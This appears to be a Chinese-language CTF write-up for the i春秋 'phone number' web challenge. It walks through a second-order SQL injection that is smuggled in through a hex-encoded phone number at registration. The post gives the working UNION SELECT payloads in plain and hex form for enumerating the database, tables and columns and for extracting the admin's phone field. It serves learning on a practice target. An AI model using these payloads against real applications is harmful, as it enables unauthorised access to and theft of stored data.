i春秋 WEB phone number

52 篇文章 6 订阅
21 篇文章 2 订阅

i春秋 WEB phone number

一天一道CTF题目,能多不能少

打开网页是一个登陆页面,还能够注册,注册一个账号登陆进去,发现登录名和电话号码有回显:
在这里插入图片描述
点击check按钮,发现会查询你的电话号码~~
在这里插入图片描述
毕竟题目也是提示电话号码嘛!!
想到是不是二次注入~
重新注册的时候发现提示电话号码必须是字符:
在这里插入图片描述
既然只能传入数字,那么其他进制的数字能行吗?
尝试16进制,成功,啊哈哈哈哈哈哈
由于电话号码是数字,就不需要引号啦
构造一下语句,查字段:
在这里插入图片描述
发现电话号码只能输入11的长度,直接改客户端代码
进去后发现:
在这里插入图片描述
点击check得到:
在这里插入图片描述
确定可能真的存在注入,,,,而且字段还不是五个
继续注册,继续查,,,
在这里插入图片描述在这里插入图片描述
确定只有一个字段,坑的一批~
这就好办了,爆数据库:1 and 1=2 union select database()
16进制:3120616E6420313D3220756E696F6E2073656C6563742064617461626173652829
在这里插入图片描述
在这里插入图片描述
得到数据库webdb
继续爆表名:1 and 1=2 union select (select group_concat(table_name) from information_schema.tables where table_schema=database())
16进制:3120616E6420313D322020756E696F6E2073656C65637420202873656C6563742067726F75705F636F6E636174287461626C655F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D613D6461746162617365282929
在这里插入图片描述
在这里插入图片描述
得到只有一个表名为user
继续爆列名:1 and 1=2 union select (select group_concat(column_name) from information_schema.columns where table_name="user")
16进制:3120616E6420313D3220756E696F6E2073656C656374202873656C6563742067726F75705F636F6E63617428636F6C756D6E5F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D22757365722229
在这里插入图片描述
在这里插入图片描述
查看这两个字段里面的内容:1 and 1=2 union select (select group_concat(User) from user)
16进制:3120616E6420313D3220756E696F6E2073656C656374202873656C6563742067726F75705F636F6E6361742855736572292066726F6D207573657229
不过一直是db error
按道理来说没毛病啊!!!
最后,突然发现页面有个注释!!!!:
在这里插入图片描述
编码有问题,放到notepad++发现:
在这里插入图片描述
admin???电话??
难道不是查看admin的密码吗,为什么又查看不了?
后来看了别人WP才知道,,,,,,
不需要gtoup_concat()直接爆列名就可以了~~
构造:1 and 1=2 union select column_name from information_schema.columns where table_name="user"
16进制:3120616E6420313D3220756E696F6E2073656C65637420636F6C756D6E5F6E616D652066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D227573657222
在这里插入图片描述
在这里插入图片描述
没错,有个phone,还有username,肯定是admin的phone里面,,,
执行语句:1 and 1=2 union select phone from user where username="admin"
16进制:3120616E6420313D3220756E696F6E2073656C6563742070686F6E652066726F6D207573657220776865726520757365726E616D653D2261646D696E22
在这里插入图片描述
在这里插入图片描述
get flag:flag{6dd303b0-8fce-2396-9ad8-d9f7a72f84b0}

说实在,还是对group_concat不起作用有点不理解
难道是因为只有一字段的原因???
怀疑自己写错语句了
自己又去查看了一些关于group_concat函数的使用
构造:1 and 1=2 union select group_concat(User,0x3a,Password) from user
还是没得用,头皮发麻,,,,,,,,
最后自己想了一下,是不是group_concat有长度限制??
百度了一下,找到:
在这里插入图片描述
可能这就是原因了吧~~
真滴是坑!!!

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值